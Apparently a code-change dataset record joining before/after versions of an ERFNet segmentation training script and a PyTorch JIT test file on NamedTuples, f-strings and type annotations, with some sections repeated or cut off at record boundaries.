iouVal = IoUMeter(datasetMeta.NUM_CLASSES, datasetMeta.IGNORE_INDEX) if args.val_iou else None
average_epoch_loss_val = do_val_epoch(args, model, criterion, loader_val, enc, epoch, iouVal)
logger.write(epoch, average_epoch_loss_train, average_epoch_loss_val, iouTrain.getIoU()[0] if iouTrain else 0, iouVal.getIoU()[0] if iouVal else 0, curr_lr, 0)
if iouVal is None:
curr_iou = -average_epoch_loss_val
else:
curr_iou = iouVal.getIoU()[0]
is_best = curr_iou > max_iou
max_iou = max(curr_iou, max_iou)
save_train_state(args, max_iou, enc, epoch, is_best, model, optimizer, savedir, scheduler)
if is_best:
msg = f'max val iou={iouVal.getIoU()[0] * 100 if iouVal else 0:.2f}, in epoch {epoch}'
if (not enc):
with open(savedir + "/best.txt", "w") as f:
f.write(msg)
else:
with open(savedir + "/best_encoder.txt", "w") as f:
f.write(msg)
return model
def do_train_epoch(args, model, optimizer, scheduler, criterion, loader: DataLoader, enc: bool, epoch: int, IoU: IoUMeter = None):
print(f'======CURRENT EPOCH --- {epoch} --- TRAIN======')
batch_losses = []
batch_times = []
if (IoU):
IoU.reset()
effective_to_simulated_batch_ratio = args.batch_size / args.gpu_batch_size
model.train()
for step, (images, labels) in enumerate(loader):
start_time = time.time()
images = images.to(device)
labels = labels.to(device)
optimizer.zero_grad()
avg_loss = 0
for inputs, targets in zip(images.split(args.gpu_batch_size), labels.split(args.gpu_batch_size)):
outputs = model(inputs, only_encode=enc)
loss = criterion(outputs, targets[:, 0]) / effective_to_simulated_batch_ratio
avg_loss += loss.item()
loss.backward()
optimizer.step()
batch_losses.append(avg_loss)
batch_times.append(time.time() - start_time)
if (IoU):
IoU.addBatch(outputs.max(1)[1].unsqueeze(1).detach(), targets.detach())
if args.show_loss > 0 and step % args.show_loss == 0:
avg = sum(batch_losses) / len(batch_losses)
print(f'loss: {avg:0.4}, epoch: {epoch}, step: {step}, ',
f'Avg time/image: {sum(batch_times) / args.batch_size / len(batch_times):.4f}')
average_epoch_loss = sum(batch_losses) / len(batch_losses)
if (IoU):
iou_val, iou_classes = IoU.getIoU()
print(f'ep {epoch} MEAN IoU on train: {iou_val * 100:.2f}%')
scheduler.step(epoch)
return average_epoch_loss
def do_val_epoch(args, model, criterion, loader: DataLoader, enc: bool, epoch: int, IoU: IoUMeter = None):
print(f'======CURRENT EPOCH --- {epoch} --- VALIDATE======')
model.eval()
batch_losses = []
batch_times = []
if (IoU):
IoU.reset()
with torch.no_grad():
for step, (images, labels) in enumerate(loader):
start_time = time.time()
images = images.to(device)
labels = labels.to(device)
outputs = model(images, only_encode=enc)
loss = criterion(outputs, labels[:, 0])
batch_losses.append(loss.item())
batch_times.append(time.time() - start_time)
if (IoU):
IoU.addBatch(outputs.max(1)[1].unsqueeze(1).detach(), labels.detach())
if args.show_loss > 0 and step % args.show_loss == 0:
avg = sum(batch_losses) / len(batch_losses)
print(f'loss: {avg:0.4}, epoch: {epoch}, step: {step}, ',
f'Avg time/image: {sum(batch_times) / args.batch_size / len(batch_times):.4f}')
average_epoch_loss = sum(batch_losses) / len(batch_losses)
if (IoU):
iou_val, iou_classes = IoU.getIoU()
print(f'ep {epoch} MEAN IoU on val: {iou_val * 100:.2f}%')
return average_epoch_loss
def save_checkpoint(state, is_best, path_checkpoint, path_best):
torch.save(state, path_checkpoint)
if is_best:
torch.save(state, path_best)
def main(args):
if not args.no_benchmark:
cudnn.benchmark = True
print(f'cudnn.enabled={cudnn.enabled}, cudnn.benchmark={cudnn.benchmark}')
start_training = time.time()
savedir = args.savedir
if not exists(savedir):
makedirs(savedir)
with open(savedir + '/opts.txt', "w") as f:
f.write(str(args))
datasetMeta = get_dataset_metadata(args.dataset)
model = ERFNet(datasetMeta.NUM_CLASSES)
copy_object_sourcefile(model, savedir)
copyfile(__file__, savedir + '/' + basename(__file__))
model = torch.nn.DataParallel(model).to(device)
if args.weights:
status = model.load_state_dict(torch.load(args.weights), strict=False)
print(status)
if (not args.decoder):
print("-------TRAINING ENC-------")
model = trainer(args, model, enc=True)
print("-------TRAINING DEC-------")
if (not args.weights):
pretrainedEnc = next(model.children()).encoder
model = ERFNet(datasetMeta.NUM_CLASSES, encoder=pretrainedEnc)
model = torch.nn.DataParallel(model).to(device)
trainer(args, model, enc=False)
training_duration = time.time() - start_training
minutes, seconds = divmod(int(training_duration), 60)
hours, minutes = divmod(minutes, 60)
print(f"Training duration: {hours:02}:{minutes:02}:{seconds:02}")
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('--weights', help='file with initializing weights')
parser.add_argument('--show-loss', type=int, default=200)
parser.add_argument('--epochs-save', type=int, default=0, help='save every n epochs')
parser.add_argument('--decoder', action='store_true', help='if specified, only train the decoder')
parser.add_argument('--train-iou', action='store_true', default=False)
parser.add_argument('--val-iou', action='store_true', default=True)
parser.add_argument('--resume', action='store_true')
parser.add_argument('--no-benchmark', action='store_true')
parser.add_argument('--no-pin-memory', action='store_true')
parser.add_argument('--num-epochs', type=int, default=300)
parser.add_argument('--num-workers', type=int, default=4)
parser.add_argument('--batch-size', type=int, default=16)
parser.add_argument('--gpu-batch-size', type=int, default=None, help='the actual number of images processes simultaneously on GPU. If not specified, defaults to batch-size.')
parser.add_argument('--savedir', default='resources/save/tests')
parser.add_argument('--dataset', choices=['cityscapes', 'cityscapes_small', 'v_kitti'], default='v_kitti')
parser.add_argument('--datalist', default='resources/dataset_lists/full.vkd')
parser.add_argument('--kth-frame', type=int, help='In training, consider labels for every kth frame', default=4, required=False)
parsed_args = parser.parse_args()
if parsed_args.gpu_batch_size is None:
parsed_args.gpu_batch_size = parsed_args.batch_size
assert parsed_args.batch_size % parsed_args.gpu_batch_size == 0
print(parsed_args)
main(parsed_args)
| import os
import time
from argparse import ArgumentParser
from os import makedirs
from os.path import basename, exists
from shutil import copyfile
import torch
import torch.backends.cudnn as cudnn
from torch import nn
from torch.optim import Adam, lr_scheduler
from torch.utils.data import DataLoader
from config.config import TRAIN_RESOLUTION
from dataset.dataset_metadata import get_dataset_metadata
from dataset.dataset_seg import get_dataset
from dataset.dataset_transforms import get_transform_seg
from model.erfnet import ERFNet
from utils.class_weights import get_class_weights
from utils.iou_meter import IoUMeter
from utils.logger import AutomatedLogger
from utils.misc import copy_object_sourcefile
device = torch.device('cuda')
def save_train_state(args, max_iou, enc: bool, epoch: int, is_best, model, optimizer, savedir, scheduler):
if enc:
path_checkpoint = savedir + '/checkpoint_enc.pth.tar'
path_best = savedir + '/model_best_enc.pth.tar'
else:
path_checkpoint = savedir + '/checkpoint.pth.tar'
path_best = savedir + '/model_best.pth.tar'
save_checkpoint({
'epoch': epoch + 1,
'arch': str(model),
'state_dict': model.state_dict(),
'best_acc': max_iou,
'optimizer': optimizer.state_dict(),
'scheduler': scheduler.state_dict(),
}, is_best, path_checkpoint, path_best)
if (enc):
filename = f'{savedir}/model_encoder-{epoch:03}.pth'
path_best = f'{savedir}/model_encoder_best.pth'
else:
filename = f'{savedir}/model-{epoch:03}.pth'
path_best = f'{savedir}/model_best.pth'
if args.epochs_save > 0 and epoch > 0 and epoch % args.epochs_save == 0:
torch.save(model.state_dict(), filename)
print(f'save: {filename} (epoch: {epoch})')
if (is_best):
torch.save(model.state_dict(), path_best)
print(f'save: {path_best} (epoch: {epoch})')
def load_train_resume(enc, model, optimizer, savedir, scheduler):
if enc:
path_checkpoint = savedir + '/checkpoint_enc.pth.tar'
else:
path_checkpoint = savedir + '/checkpoint.pth.tar'
assert os.path.exists(path_checkpoint)
checkpoint = torch.load(path_checkpoint)
start_epoch = checkpoint['epoch']
model.load_state_dict(checkpoint['state_dict'])
optimizer.load_state_dict(checkpoint['optimizer'])
max_iou = checkpoint['best_acc']
scheduler.load_state_dict(checkpoint['scheduler'])
print(f'checkpoint for epoch {checkpoint["epoch"]} loaded')
return max_iou, start_epoch
def get_DataLoaders(args, enc):
res = TRAIN_RESOLUTION[args.dataset + '_video']
pair_transform = get_transform_seg(args.dataset, enc, augment=True, height=res.height, width=res.width)
pair_transform_val = get_transform_seg(args.dataset, enc, augment=False, height=res.height, width=res.width)
dataset_train = get_dataset(args.dataset, args.datalist, pair_transform, 'train', args.kth_frame)
dataset_val = get_dataset(args.dataset, args.datalist, pair_transform_val, 'val')
pin_mem = not args.no_pin_memory
print(f'Pin memory: {pin_mem}')
loader_train = DataLoader(dataset_train, num_workers=args.num_workers, batch_size=args.batch_size, shuffle=True, pin_memory=pin_mem)
loader_val = DataLoader(dataset_val, num_workers=args.num_workers, batch_size=args.batch_size, shuffle=False, pin_memory=pin_mem)
return loader_train, loader_val
def trainer(args, model, enc, epoch_callback_before=None):
datasetMeta = get_dataset_metadata(args.dataset)
res = TRAIN_RESOLUTION[args.dataset + '_video']
weight = get_class_weights(args.dataset, args.datalist, enc, res.height, res.width, args.num_workers, args.batch_size, args.kth_frame).to(device)
print(f'Weights are: {weight}')
criterion = nn.CrossEntropyLoss(ignore_index=datasetMeta.IGNORE_INDEX, reduction='mean', weight=weight)
optimizer = Adam(model.parameters(), lr=5e-4, weight_decay=1e-4, betas=(0.9, 0.999))
lam = lambda epoch: pow((1 - (epoch / args.num_epochs)), 0.9)
scheduler = lr_scheduler.LambdaLR(optimizer, lr_lambda=lam)
return train(args, model, enc, criterion, optimizer, scheduler, epoch_callback_before)
def train(args, model, enc, criterion, optimizer, scheduler, epoch_callback_before=None):
max_iou = 0
loader_train, loader_val = get_DataLoaders(args, enc)
print(f'Dataset size train: {len(loader_train.dataset)}, val: {len(loader_val.dataset)}')
savedir = args.savedir
logger = AutomatedLogger(savedir, enc)
start_epoch = 1
if args.resume:
max_iou, start_epoch = load_train_resume(enc, model, optimizer, savedir, scheduler)
datasetMeta = get_dataset_metadata(args.dataset)
for epoch in range(start_epoch, args.num_epochs + 1):
if epoch_callback_before:
epoch_callback_before(epoch, model)
curr_lr = 0
for param_group in optimizer.param_groups:
curr_lr = float(param_group['lr'])
print("CURRENT LR: ", param_group['lr'])
iouTrain = IoUMeter(datasetMeta.NUM_CLASSES, datasetMeta.IGNORE_INDEX) if args.train_iou else None
average_epoch_loss_train = do_train_epoch(args, model, optimizer, scheduler, criterion, loader_train, enc, epoch, iouTrain)
iouVal = IoUMeter(datasetMeta.NUM_CLASSES, datasetMeta.IGNORE_INDEX) if args.val_iou else None
average_epoch_loss_val = do_val_epoch(args, model, criterion, loader_val, enc, epoch, iouVal)
logger.write(epoch, average_epoch_loss_train, average_epoch_loss_val, iouTrain.getIoU()[0] if iouTrain else 0, iouVal.getIoU()[0] if iouVal else 0, curr_lr, 0)
if iouVal is None:
curr_iou = -average_epoch_loss_val
else:
curr_iou = iouVal.getIoU()[0]
is_best = curr_iou > max_iou
max_iou = max(curr_iou, max_iou)
save_train_state(args, max_iou, enc, epoch, is_best, model, optimizer, savedir, scheduler)
if is_best:
msg = f'max val iou={iouVal.getIoU()[0] * 100 if iouVal else 0:.2f}, in epoch {epoch}'
if (not enc):
with open(savedir + "/best.txt", "w") as f:
f.write(msg)
else:
with open(savedir + "/best_encoder.txt", "w") as f:
f.write(msg)
return model
def do_train_epoch(args, model, optimizer, scheduler, criterion, loader: DataLoader, enc: bool, epoch: int, IoU: IoUMeter = None):
print(f'======CURRENT EPOCH --- {epoch} --- TRAIN======')
batch_losses = []
batch_times = []
if (IoU):
IoU.reset()
effective_to_simulated_batch_ratio = args.batch_size / args.gpu_batch_size
model.train()
for step, (images, labels) in enumerate(loader):
start_time = time.time()
images = images.to(device)
labels = labels.to(device)
optimizer.zero_grad()
avg_loss = 0
for inputs, targets in zip(images.split(args.gpu_batch_size), labels.split(args.gpu_batch_size)):
outputs = model(inputs, only_encode=enc)
loss = criterion(outputs, targets[:, 0]) / effective_to_simulated_batch_ratio
avg_loss += loss.item()
loss.backward()
optimizer.step()
batch_losses.append(avg_loss)
batch_times.append(time.time() - start_time)
if (IoU):
IoU.addBatch(outputs.max(1)[1].unsqueeze(1).detach(), targets.detach())
if args.show_loss > 0 and step % args.show_loss == 0:
avg = sum(batch_losses) / len(batch_losses)
print(f'loss: {avg:0.4}, epoch: {epoch}, step: {step}, ',
f'Avg time/image: {sum(batch_times) / args.batch_size / len(batch_times):.4f}')
average_epoch_loss = sum(batch_losses) / len(batch_losses)
if (IoU):
iou_val, iou_classes = IoU.getIoU()
print(f'ep {epoch} MEAN IoU on train: {iou_val * 100:.2f}%')
scheduler.step(epoch)
return average_epoch_loss
def do_val_epoch(args, model, criterion, loader: DataLoader, enc: bool, epoch: int, IoU: IoUMeter = None):
print(f'======CURRENT EPOCH --- {epoch} --- VALIDATE======')
model.eval()
batch_losses = []
batch_times = []
if (IoU):
IoU.reset()
with torch.no_grad():
for step, (images, labels) in enumerate(loader):
start_time = time.time()
images = images.to(device)
labels = labels.to(device)
outputs = model(images, only_encode=enc)
loss = criterion(outputs, labels[:, 0])
batch_losses.append(loss.item())
batch_times.append(time.time() - start_time)
if (IoU):
IoU.addBatch(outputs.max(1)[1].unsqueeze(1).detach(), labels.detach())
if args.show_loss > 0 and step % args.show_loss == 0:
avg = sum(batch_losses) / len(batch_losses)
print(f'loss: {avg:0.4}, epoch: {epoch}, step: {step}, ',
f'Avg time/image: {sum(batch_times) / args.batch_size / len(batch_times):.4f}')
average_epoch_loss = sum(batch_losses) / len(batch_losses)
if (IoU):
iou_val, iou_classes = IoU.getIoU()
print(f'ep {epoch} MEAN IoU on val: {iou_val * 100:.2f}%')
return average_epoch_loss
def save_checkpoint(state, is_best, path_checkpoint, path_best):
torch.save(state, path_checkpoint)
if is_best:
torch.save(state, path_best)
def main(args):
if not args.no_benchmark:
cudnn.benchmark = True
print(f'cudnn.enabled={cudnn.enabled}, cudnn.benchmark={cudnn.benchmark}')
start_training = time.time()
savedir = args.savedir
if not exists(savedir):
makedirs(savedir)
with open(savedir + '/opts.txt', "w") as f:
f.write(str(args))
datasetMeta = get_dataset_metadata(args.dataset)
model = ERFNet(datasetMeta.NUM_CLASSES)
copy_object_sourcefile(model, savedir)
copyfile(__file__, savedir + '/' + basename(__file__))
model = torch.nn.DataParallel(model).to(device)
if args.weights:
status = model.load_state_dict(torch.load(args.weights), strict=False)
print(status)
if (not args.decoder):
print("-------TRAINING ENC-------")
model = trainer(args, model, enc=True)
print("-------TRAINING DEC-------")
if (not args.weights):
pretrainedEnc = next(model.children()).encoder
model = ERFNet(datasetMeta.NUM_CLASSES, encoder=pretrainedEnc)
model = torch.nn.DataParallel(model).to(device)
trainer(args, model, enc=False)
training_duration = time.time() - start_training
minutes, seconds = divmod(int(training_duration), 60)
hours, minutes = divmod(minutes, 60)
print(f"Training duration: {hours:02}:{minutes:02}:{seconds:02}")
if __name__ == '__main__':
parser = ArgumentParser()
parser.add_argument('--weights', help='file with initializing weights')
parser.add_argument('--show-loss', type=int, default=200)
parser.add_argument('--epochs-save', type=int, default=0, help='save every n epochs')
parser.add_argument('--decoder', action='store_true', help='if specified, only train the decoder')
parser.add_argument('--train-iou', action='store_true', default=False)
parser.add_argument('--val-iou', action='store_true', default=True)
parser.add_argument('--resume', action='store_true')
parser.add_argument('--no-benchmark', action='store_true')
parser.add_argument('--no-pin-memory', action='store_true')
parser.add_argument('--num-epochs', type=int, default=300)
parser.add_argument('--num-workers', type=int, default=4)
parser.add_argument('--batch-size', type=int, default=16)
parser.add_argument('--gpu-batch-size', type=int, default=None, help='the actual number of images processes simultaneously on GPU. If not specified, defaults to batch-size.')
parser.add_argument('--savedir', default='resources/save/tests')
parser.add_argument('--dataset', choices=['cityscapes', 'cityscapes_small', 'v_kitti'], default='v_kitti')
parser.add_argument('--datalist', default='resources/dataset_lists/full.vkd')
parser.add_argument('--kth-frame', type=int, help='In training, consider labels for every kth frame', default=4, required=False)
parsed_args = parser.parse_args()
if parsed_args.gpu_batch_size is None:
parsed_args.gpu_batch_size = parsed_args.batch_size
assert parsed_args.batch_size % parsed_args.gpu_batch_size == 0
print(parsed_args)
main(parsed_args)
|
from collections import namedtuple
from torch.testing._internal.common_utils import run_tests
from torch.testing._internal.jit_utils import JitTestCase
from torch.testing import FileCheck
from torch import jit
from typing import NamedTuple, List, Optional, Dict, Tuple, Any
from jit.test_module_interface import TestModuleInterface # noqa: F401
import unittest
import sys
import torch
import torch.testing._internal.jit_utils
import torch.nn as nn
import types
class TestScriptPy3(JitTestCase):
def test_joined_str(self):
def func(x):
hello, test = "Hello", "test"
print(f"{hello + " " + test}, I'm a {test}") # noqa E999
print(f"format blank") # noqa F541
hi = 'hi'
print(f"stuff before {hi}")
print(f"{hi} stuff after")
return x + 1
x = torch.arange(4., requires_grad=True)
# TODO: Add support for f-strings in string parser frontend
# self.checkScript(func, [x], optimize=True, capture_output=True)
with self.capture_stdout() as captured:
out = func(x)
scripted = torch.jit.script(func)
with self.capture_stdout() as captured_script:
out_script = func(x)
self.assertEqual(out, out_script)
self.assertEqual(captured, captured_script)
@unittest.skipIf(sys.version_info[:2] < (3, 7), "`dataclasses` module not present on < 3.7")
def test_dataclass_error(self):
from dataclasses import dataclass
@dataclass
class NormalizationInfo(object):
mean: float = 0.0
def compute(self, total_rows):
return self.mean
def fn():
return NormalizationInfo(1, 2, 3, 4, 5)
with self.assertRaisesRegex(OSError, "NormalizationInfo"):
torch.jit.script(fn)
def test_optional_dict_construct(self):
class M(torch.nn.Module):
def use(self, buffer: Dict[str, Optional[torch.Tensor]]):
return buffer["prev_key"]
def forward(self, x):
prev_key = torch.rand(2, 3)
next_key = torch.rand(2, 3)
saved_state: Dict[str, Optional[torch.Tensor]] = {
"prev_key": prev_key,
"next_key": next_key,
}
return self.use(saved_state)
self.checkModule(M(), (torch.rand(2, 2),))
def test_kwarg_support(self):
with self.assertRaisesRegex(torch.jit.frontend.NotSupportedError, "variable number of arguments"):
class M(torch.nn.Module):
def forward(self, *, n_tokens: int, device_name: str = 2):
pass
torch.jit.script(M())
class M(torch.nn.Module):
def forward(self, *, n_tokens: int, device_name: str):
return n_tokens, device_name
sm = torch.jit.script(M())
with self.assertRaisesRegex(RuntimeError, "missing value for argument 'n_tokens'"):
sm()
input = (3, 'hello')
self.assertEqual(sm(*input), input)
def test_named_tuple(self):
class FeatureVector(NamedTuple):
float_features: float
sequence_features: List[float]
time_since_first: float
@torch.jit.script
def foo(x) -> float:
fv = FeatureVector(3.0, [3.0], 3.0) # noqa
rv = fv.float_features
for val in fv.sequence_features:
rv += val
rv *= fv.time_since_first
return rv
self.assertEqual(foo(torch.rand(3, 4)), 18.0)
def test_named_tuple_constant(self):
class Tup(NamedTuple):
a: int
b: int
@torch.jit.script
def foo():
return Tup(1, 2)
self.assertEqual(foo(), Tup(1, 2))
def test_dict_preserves_order(self):
def dict_ordering():
a : Dict[int, int] = {}
for i in range(1000):
a[i] = i + 1
return a
self.checkScript(dict_ordering, ())
di = torch.jit.script(dict_ordering)()
res = list(di.items())
for i in range(1000):
key, value = res[i]
self.assertTrue(key == i and value == i + 1)
def test_list_unification_hint(self):
with self.assertRaisesRegex(RuntimeError, "Expected a List type hint"):
@torch.jit.script
def x():
b : int = [2, 3]
return b
def test_return_named_tuple(self):
class FeatureVector(NamedTuple):
float_features: float
sequence_features: List[float]
time_since_first: float
@torch.jit.script
def foo(x):
fv = FeatureVector(3.0, [3.0], 3.0)
return fv
out = foo(torch.rand(3, 4))
out = foo(torch.rand(3, 4))
self.assertEqual(out.float_features, 3.0)
self.assertEqual(out.sequence_features, [3.0])
self.assertEqual(out.time_since_first, 3.0)
def test_named_tuple_as_attr(self):
class Config(NamedTuple):
size: int
class MyMod(nn.Module):
configs: Dict[int, Config]
def __init__(self, configs):
super().__init__()
self.configs = configs
def forward(self, x):
for _id, config in self.configs.items():
x += config.size
return x
s = torch.jit.script(MyMod({0: Config(size=16)}))
def test_types_as_values(self):
def fn(m: torch.Tensor) -> torch.device:
return m.device
self.checkScript(fn, [torch.randn(2, 2)])
GG = namedtuple('GG', ['f', 'g'])
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
@torch.jit.ignore
def foo(self, x, z):
# type: (Tensor, Tensor) -> Tuple[GG, GG]
return GG(x, z), GG(x, z)
def forward(self, x, z):
return self.foo(x, z)
foo = torch.jit.script(Foo())
y = foo(torch.randn(2, 2), torch.randn(2, 2))
class Foo(torch.nn.Module):
def __init__(self):
super().__init__()
@torch.jit.ignore
def foo(self, x, z) -> Tuple[GG, GG]:
return GG(x, z)
def forward(self, x, z):
return self.foo(x, z)
foo = torch.jit.script(Foo())
y = foo(torch.randn(2, 2), torch.randn(2, 2))
def test_named_tuple_resolution(self):
class TheType(NamedTuple):
t: int
class MyModule(types.ModuleType):
def __init__(self):
super(MyModule, self).__init__('MyModule')
def __getattr__(self, attr):
return TheType
some_module = MyModule()
def fn() -> some_module.Type:
return some_module.Type(1)
self.checkScript(fn, [])
def test_ignore_with_types(self):
@torch.jit.ignore
def fn(x: Dict[str, Optional[torch.Tensor]]):
return x + 10
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
def forward(self, in_batch: Dict[str, Optional[torch.Tensor]]) -> torch.Tensor:
self.dropout_modality(in_batch)
fn(in_batch)
return torch.tensor(1)
@torch.jit.ignore
def dropout_modality(self, in_batch: Dict[str, Optional[torch.Tensor]]) -> Dict[str, Optional[torch.Tensor]]:
return in_batch
sm = torch.jit.script(M())
FileCheck().check("dropout_modality").check("in_batch").run(str(sm.graph))
def test_python_callable(self):
class MyPythonClass(object):
@torch.jit.ignore
def __call__(self, *args) -> str:
return str(type(args[0]))
the_class = MyPythonClass()
@torch.jit.script
def fn(x):
return the_class(x)
# This doesn't involve the string frontend, so don't use checkScript
x = torch.ones(2)
self.assertEqual(fn(x), the_class(x))
def test_bad_types(self):
@torch.jit.ignore
def fn(my_arg):
return my_arg + 10
with self.assertRaisesRegex(RuntimeError, "argument 'my_arg'"):
@torch.jit.script
def other_fn(x):
return fn('2')
def test_named_tuple_slice_unpack(self):
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int]
@torch.jit.script
def foo(a : int, b : float, c : List[int]):
tup = MyCoolNamedTuple(a, b, c) # noqa
my_a, my_b, my_c = tup
return tup[:1], my_a, my_c
self.assertEqual(foo(3, 3.5, [6]), ((3,), 3, [6]))
def test_named_tuple_lower(self):
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int]
@torch.jit.script
def foo(a : int):
tup = MyCoolNamedTuple(a, 3.14, [9]) # noqa
return tup
FileCheck().check('TupleConstruct').run(foo.graph)
torch._C._jit_pass_lower_all_tuples(foo.graph)
FileCheck().check_not('TupleConstruct').run(foo.graph)
def test_named_tuple_type_annotation(self):
global MyCoolNamedTuple # see [local resolution in python]
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int]
@torch.jit.script
def foo(x : MyCoolNamedTuple) -> MyCoolNamedTuple:
return x
mnt = MyCoolNamedTuple(42, 420.0, [666])
self.assertEqual(foo(mnt), mnt)
def test_named_tuple_wrong_types(self):
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int]
with self.assertRaisesRegex(RuntimeError, "Expected a value of type 'int' for argument 'a'"
" but instead found type 'str'"):
@torch.jit.script
def foo():
tup = MyCoolNamedTuple('foo', 'bar', 'baz') # noqa
return tup
def test_named_tuple_kwarg_construct(self):
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int]
@torch.jit.script
def foo():
tup = MyCoolNamedTuple(c=[1, 2, 3], b=3.5, a=9) # noqa
return tup
tup = foo()
self.assertEqual(tup.a, 9)
self.assertEqual(tup.b, 3.5)
self.assertEqual(tup.c, [1, 2, 3])
def test_named_tuple_default_error(self):
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int] = [3, 4, 5]
with self.assertRaisesRegex(RuntimeError, 'Default values are currently not supported'):
@torch.jit.script
def foo():
tup = MyCoolNamedTuple(c=[1, 2, 3], b=3.5, a=9) # noqa
return tup
@unittest.skipIf(True, "broken while these tests were not in CI")
def test_named_tuple_serialization(self):
class MyCoolNamedTuple(NamedTuple):
a : int
b : float
c : List[int]
class MyMod(torch.jit.ScriptModule):
@torch.jit.script_method
def forward(self):
return MyCoolNamedTuple(3, 3.5, [3, 4, 5])
mm = MyMod()
mm.save('foo.zip')
torch.testing._internal.jit_utils.clear_class_registry()
loaded = torch.jit.load('foo.zip')
out = mm()
out_loaded = loaded()
for name in ['a', 'b', 'c']:
self.assertEqual(getattr(out_loaded, name), getattr(out, name))
def test_type_annotate_py3(self):
def fn():
a : List[int] = []
b : torch.Tensor = torch.ones(2, 2)
c : Optional[torch.Tensor] = None
d : Optional[torch.Tensor] = torch.ones(3, 4)
for _ in range(10):
a.append(4)
c = torch.ones(2, 2)
d = None
return a, b, c, d
self.checkScript(fn, ())
def wrong_type():
wrong : List[int] = [0.5]
return wrong
with self.assertRaisesRegex(RuntimeError, "Lists must contain only a single type"):
torch.jit.script(wrong_type)
def test_subexpression_List_Future(self):
@torch.jit.script
def fn(x: List[torch.jit.Future[int]]) -> torch.jit.Future[int]:
return x[0]
FileCheck().check('Future[int]').check('Future[int]').run(fn.graph)
def test_subexpression_Future_annotate(self):
@torch.jit.script
def fn() -> torch.jit.Future[int]:
x: List[torch.jit.Future[int]] = []
return x[0]
FileCheck().check("Future[int][]").run(fn.graph)
def test_future_isinstance(self):
@torch.jit.script
def fn(x: Any) -> torch.jit.Future[int]:
assert isinstance(x, jit.Future[int])
return x
FileCheck().check("Future[int]").run(fn.graph)
def test_subexpression_Tuple_int_int_Future(self):
@torch.jit.script
def fn(x: Tuple[int, int, torch.jit.Future[int]]) -> Tuple[int, torch.jit.Future[int]]:
return x[0], x[2]
FileCheck().check('(int, int, Future[int])').check('(int, Future[int])').run(fn.graph)
def test_subexpression_Dict_int_Future(self):
@torch.jit.script
def fn(x: Dict[int, torch.jit.Future[int]], y: int) -> torch.jit.Future[int]:
return x[y]
FileCheck().check('Dict(int, Future(int))').check('Future[int]').run(fn.graph)
def test_subexpression_Optional(self):
@torch.jit.script
def fn(x: Optional[Dict[int, torch.jit.Future[int]]]) -> Optional[torch.jit.Future[int]]:
if x is not None:
return x[0]
else:
return None
FileCheck().check('Dict(int, Future(int))?').run(fn.graph)
def test_unimported_type_resolution(self):
# verify fallback from the python resolver to the c++ resolver
@ torch.jit.script
def fn(x):
# type: (number) -> number
return x + 1
FileCheck().check('Scalar').run(fn.graph)
def test_parser_bug(self):
def parser_bug(o: Optional[torch.Tensor]):
pass
def test_mismatched_annotation(self):
with self.assertRaisesRegex(RuntimeError, 'annotated with type'):
@torch.jit.script
def foo():
x : str = 4
return x
def test_reannotate(self):
with self.assertRaisesRegex(RuntimeError, 'declare and annotate'):
@torch.jit.script
def foo():
x = 5
if True:
x : Optional[int] = 7
def test_module_inplace_construct(self):
class M(nn.Module):
def __init__(self, start: int):
super().__init__()
self.linear = nn.Linear(3, 3)
self.attribute = start
self.parameter = nn.Parameter(torch.tensor(3, dtype=torch.float))
def method(self) -> int:
return self.attribute
@torch.jit.unused
def unused_method(self):
return self.attribute + self.attribute
def forward(self, x):
return self.linear(self.linear(x))
class N(nn.Module):
def __init__(self):
super().__init__()
self.linear = nn.Linear(4, 4)
@torch.jit.ignore
def ignored_method(self, x):
return x
def forward(self, x):
return self.linear(x)
m = torch.jit.script(M(3))
n = torch.jit.script(N())
n._reconstruct(m._c)
inp = torch.rand((3))
# Check that both modules produce the same output.
with torch.no_grad():
m_out = m(inp)
n_out = n(inp)
self.assertEqual(m_out, n_out)
# Check that ignored method is still intact.
self.assertEqual(inp, n.ignored_method(inp))
def test_export_opnames_interface(self):
global OneTwoModule
@torch.jit.interface
class OneTwoModule(nn.Module):
def one(self, x, y):
# type: (Tensor, Tensor) -> Tensor
pass
def two(self, x):
# type: (Tensor) -> Tensor
pass
def forward(self, x):
# type: (Tensor) -> Tensor
pass
class FooMod(nn.Module):
def one(self, x, y):
# type: (Tensor, Tensor) -> Tensor
return x + y
def two(self, x):
# type: (Tensor) -> Tensor
return 2 * x
def forward(self, x):
# type: (Tensor) -> Tensor
return self.one(self.two(x), x)
class BarMod(nn.Module):
def one(self, x, y):
# type: (Tensor, Tensor) -> Tensor
return x * y
def two(self, x):
# type: (Tensor) -> Tensor
return 2 / x
def forward(self, x):
# type: (Tensor) -> Tensor
return self.two(self.one(x, x))
class M(nn.Module):
sub : OneTwoModule
def __init__(self):
super(M, self).__init__()
self.sub = BarMod()
def forward(self, x):
# type: (Tensor) -> Tensor
return self.sub.forward(x)
def use_module_interface(mod_list: List[OneTwoModule], x: torch.Tensor):
return mod_list[0].forward(x) + mod_list[1].forward(x)
scripted_M_mod = torch.jit.script(M())
# Temporarily test empty output because lite interpreter does not support interface call
# Replace it with the issubset call when interface call is supported.
self.assertTrue(len(torch.jit.export_opnames(scripted_M_mod)) == 0)
# self.assertTrue(set(['aten::mul.Scalar', 'aten::mul.Tensor', 'aten::reciprocal']).issubset(
# set(torch.jit.export_opnames(scripted_M_mod))))
scripted_M_mod.sub = torch.jit.script(FooMod())
self.assertTrue(len(torch.jit.export_opnames(scripted_M_mod)) == 0)
# self.assertTrue(set(['aten::add.Tensor', 'aten::mul.Scalar']).issubset(
# set(torch.jit.export_opnames(scripted_M_mod))))
if __name__ == '__main__':
run_tests()
| from collections import namedtuple
from torch.testing._internal.common_utils import run_tests
from torch.testing._internal.jit_utils import JitTestCase
from torch.testing import FileCheck
from torch import jit
from typing import NamedTuple, List, Optional, Dict, Tuple, Any
from jit.test_module_interface import TestModuleInterface # noqa: F401
import unittest
import sys
import torch
import torch.testing._internal.jit_utils
import torch.nn as nn
import types
class TestScriptPy3(JitTestCase):
def test_joined_str(self):
def func(x):
hello, test = "Hello", "test"
print(f"{hello + ' ' + test}, I'm a {test}") # noqa E999
